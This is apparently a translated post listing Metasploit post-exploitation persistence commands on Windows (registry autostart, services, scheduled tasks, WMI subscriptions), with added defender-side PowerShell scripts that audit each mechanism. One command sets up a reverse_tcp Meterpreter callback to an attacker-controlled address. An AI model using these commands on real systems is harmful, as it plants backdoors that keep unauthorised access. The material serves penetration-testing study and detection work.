Common Metasploit persistence techniques

Common ways of maintaining access during Metasploit post-exploitation.

Registry

Upload a VBS script that runs at startup (deprecated).

run persistence -r 192.168.1.100 -p 4444 -i 5 -P windows/x64/meterpreter/reverse_tcp -X

Upload an EXE that runs at startup (replaces the VBS method).

run post/windows/manage/persistence_exe REXEPATH=/home/exp10it/msf.exe

Add a PowerShell autostart entry.

use exploit/windows/local/registry_persistence

STARTUP can be specified, but note that this must be run while the session has Administrator privileges; a SYSTEM session must first drop privileges, otherwise it has no effect.
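All three registry methods above end up as an entry under a Run/RunOnce key, so that is where a defender checks. The following is an added PowerShell example, not code from the original post or from Metasploit: it lists every Run/RunOnce value in both hives and flags the patterns those modules produce (a .vbs launched by wscript, an EXE in a user-writable directory, or a PowerShell command line). The key list and the pattern are assumptions for illustration, not a complete detection rule.

```powershell
# Added example (not from the original post): audit Run/RunOnce autostart entries.
# Assumption: these are the keys worth reviewing on a typical host; extend as needed.
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumption: patterns matching the autostart styles described above (script hosts,
# PowerShell, or binaries dropped in user-writable locations).
$SuspiciousPattern = '(?i)wscript|cscript|\.vbs|powershell|\\Temp\\|\\AppData\\|\\Users\\Public\\'

# Metadata properties Get-ItemProperty attaches to every result; they are not registry values.
$MetaProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-RunKeyAutostarts {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $entries = Get-ItemProperty -Path $key
        foreach ($prop in $entries.PSObject.Properties) {
            if ($MetaProps -contains $prop.Name) { continue }
            $command = [string]$prop.Value
            [PSCustomObject]@{
                Key        = $key
                Name       = $prop.Name
                Command    = $command
                Suspicious = [bool]($command -match $SuspiciousPattern)
            }
        }
    }
}

# Flagged entries first; review each Command against what the host is expected to run.
Get-RunKeyAutostarts | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

A flagged entry is a lead, not a verdict: some legitimate installers also start from AppData. The useful signal is an entry whose command, name, or timestamp does not match anything deployed to that machine.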

Service

Only supports x86 payloads; the session can be upgraded to a 64-bit one via exploit/windows/local/payload_inject.

use exploit/windows/local/persistence_service

Scheduled task

Uploads an EXE and runs it; requires SYSTEM privileges.

run scheduleme -e /home/exp10it/msf.exe -H 12

Midway it prints Failed to create scheduled task!!, but the task has in fact been added successfully.
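Both the service method and the scheduled-task method above run an uploaded EXE, so the defender-side check for both is the same: find services and task actions whose image lives outside the directories where legitimate ones normally sit. The following is an added PowerShell example covering both sections, not code from the original post or from Metasploit. The list of "expected" directories and the helper names are assumptions; adjust them to your own baseline.

```powershell
# Added example (not from the original post): audit service images and scheduled-task
# actions for binaries outside the usual system/program directories.
# Assumption: these are the directories a legitimate service or task image lives in.
$ExpectedDirs = @("$env:SystemRoot\", "${env:ProgramFiles}\", "${env:ProgramFiles(x86)}\") |
    Where-Object { $_ -ne '\' }   # drop entries whose environment variable was unset

function Test-ExpectedImagePath {
    param([string]$Image)
    foreach ($dir in $ExpectedDirs) {
        if ($Image.StartsWith($dir, [System.StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

# Reduce a service PathName ("C:\x\y.exe" -arg, or C:\x\y.exe -arg) to the bare image path.
function Get-ImageFromCommandLine {
    param([string]$CommandLine)
    if ($CommandLine.StartsWith('"')) { return $CommandLine.Split('"')[1] }
    return $CommandLine.Split(' ')[0]
}

function Get-UnusualServices {
    Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $image = Get-ImageFromCommandLine $_.PathName
        if (-not (Test-ExpectedImagePath $image)) {
            [PSCustomObject]@{
                Kind      = 'Service'
                Name      = $_.Name
                StartMode = $_.StartMode
                Principal = $_.StartName
                Image     = $image
            }
        }
    }
}

function Get-UnusualScheduledTasks {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # only Exec actions carry an image path
            $image = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not (Test-ExpectedImagePath $image)) {
                [PSCustomObject]@{
                    Kind      = 'Task'
                    Name      = "$($task.TaskPath)$($task.TaskName)"
                    StartMode = $task.State
                    Principal = $task.Principal.UserId
                    Image     = "$image $($action.Arguments)".Trim()
                }
            }
        }
    }
}

# Run from an elevated shell so that all services and tasks are visible.
Get-UnusualServices
Get-UnusualScheduledTasks
```

The Principal column is worth reading alongside the image path: the scheduleme method above needs SYSTEM, so a task running as SYSTEM from a user-writable directory is the combination to investigate first.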

WMI

Executes via PowerShell, a fileless backdoor, supports 5 trigger types.

use exploit/windows/local/wmi_persistence

Note that when switching trigger types, remove the previous backdoor first.

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Updater'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Updater'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Updater%'" | Remove-WmiObject -Verbose
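The three cleanup commands above remove a subscription whose name is already known. Before removing anything, a defender wants the full picture: every binding in root\subscription, resolved to the filter query that triggers it and the consumer payload it runs. The following is an added PowerShell example, not code from the original post or from Metasploit; the function name is an assumption, and it relies on the reference strings Get-WmiObject returns for the Filter and Consumer properties (of the form __EventFilter.Name="...").

```powershell
# Added example (not from the original post): enumerate WMI event subscriptions and
# show each binding as filter query -> consumer payload.
function Get-WmiSubscriptionBindings {
    $ns = 'root\subscription'

    # Index filters and consumers by Name so each binding can be resolved.
    # Querying the __EventConsumer base class returns every consumer subclass
    # (CommandLineEventConsumer, ActiveScriptEventConsumer, ...).
    $filters = @{}
    Get-WmiObject -Namespace $ns -Class __EventFilter | ForEach-Object { $filters[$_.Name] = $_ }
    $consumers = @{}
    Get-WmiObject -Namespace $ns -Class __EventConsumer | ForEach-Object { $consumers[$_.Name] = $_ }

    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding | ForEach-Object {
        # Filter/Consumer are reference strings such as __EventFilter.Name="Updater";
        # pull the Name out of each (assumption: the key is always Name, as it is for these classes).
        $fName = if ($_.Filter   -match 'Name="([^"]+)"') { $matches[1] } else { [string]$_.Filter }
        $cName = if ($_.Consumer -match 'Name="([^"]+)"') { $matches[1] } else { [string]$_.Consumer }
        $f = $filters[$fName]
        $c = $consumers[$cName]
        [PSCustomObject]@{
            Filter       = $fName
            Query        = if ($f) { $f.Query } else { '<missing filter>' }
            Consumer     = $cName
            ConsumerType = if ($c) { $c.__CLASS } else { '<missing consumer>' }
            # Only one of these is populated, depending on the consumer type
            CommandLine  = if ($c) { $c.CommandLineTemplate } else { $null }
            ScriptText   = if ($c) { $c.ScriptText } else { $null }
        }
    }
}

Get-WmiSubscriptionBindings | Format-List
```

Two things make the output actionable. A consumer whose CommandLine or ScriptText invokes PowerShell with an encoded command is the fileless pattern described above and on most hosts there is no legitimate reason for it. And because the post recommends deleting the old subscription before switching triggers, a binding that survives alongside a second filter with a different query is a sign of exactly that switch having been made without cleanup.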